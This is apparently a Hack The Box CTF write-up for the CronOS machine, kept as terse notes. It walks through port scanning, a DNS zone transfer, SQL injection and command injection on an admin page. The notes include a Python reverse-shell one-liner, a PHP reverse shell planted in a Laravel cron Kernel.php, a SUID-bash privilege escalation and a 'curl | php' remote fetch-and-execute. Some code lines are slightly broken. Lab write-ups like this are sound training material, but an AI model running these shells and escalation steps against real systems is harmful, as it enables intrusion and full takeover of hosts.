HTB CronOS Writeup


Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP enum:

  • Default server page found for apache2

try doing nslookup:

commands: nslookup

type: server

now that we see that it's hosting cronos.htb, let's try some zone transfer to discover any other subdomains.

dig AXFR cronos.htb @IP

Go buster didn't have luck.

save the found sub-domains to /etc/hosts

Found the admin page.

try the sql injection

save the post request as login.req and do

sqlmap -r login.req

redirecting happening/

tried using '-- - in the user section and it worked! (intercept the traffic in the burpsuite and url encode it)

now we can execute any commands!

Adjusting the command section in the burpsuite, I was able to execute a command.

Let's try a one liner to get a reverse shell.


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'

Make sure to url encode it. got the reverse shell!

called the shell with python -c 'import pty; pty.spawn("/bin/sh")'


  • host the and run it

Found a suspicious cronjob

php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

where we can find a kernel cron job:


how to set up a cronjob that contains terminal commands

    protected function schedule(Schedule $schedule)
        $schedule->exec('cd ~/Code/lpg && ls')

find / -name Kernel.php 2>/dev/null

$schedule->exec('php -r '$sock=fsockopen("",7777);exec("/bin/sh -i <&3 >&3 2>&3");')->everyMinute();php -r '$sock=fsockopen("",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

I located the file in the html and downloaded by visiting the site.

Used this guy's method:

let’s just make a temporary copy of bash (as root) and give it the SUID bit.

We add the following code to Kernel.php

protected function schedule(Schedule $schedule)
    $cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';

…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.

Another method would be to edit the artisan file and let the system download a reverseshell from our host and execute it.

<?php system('curl | php') ?>

Last updated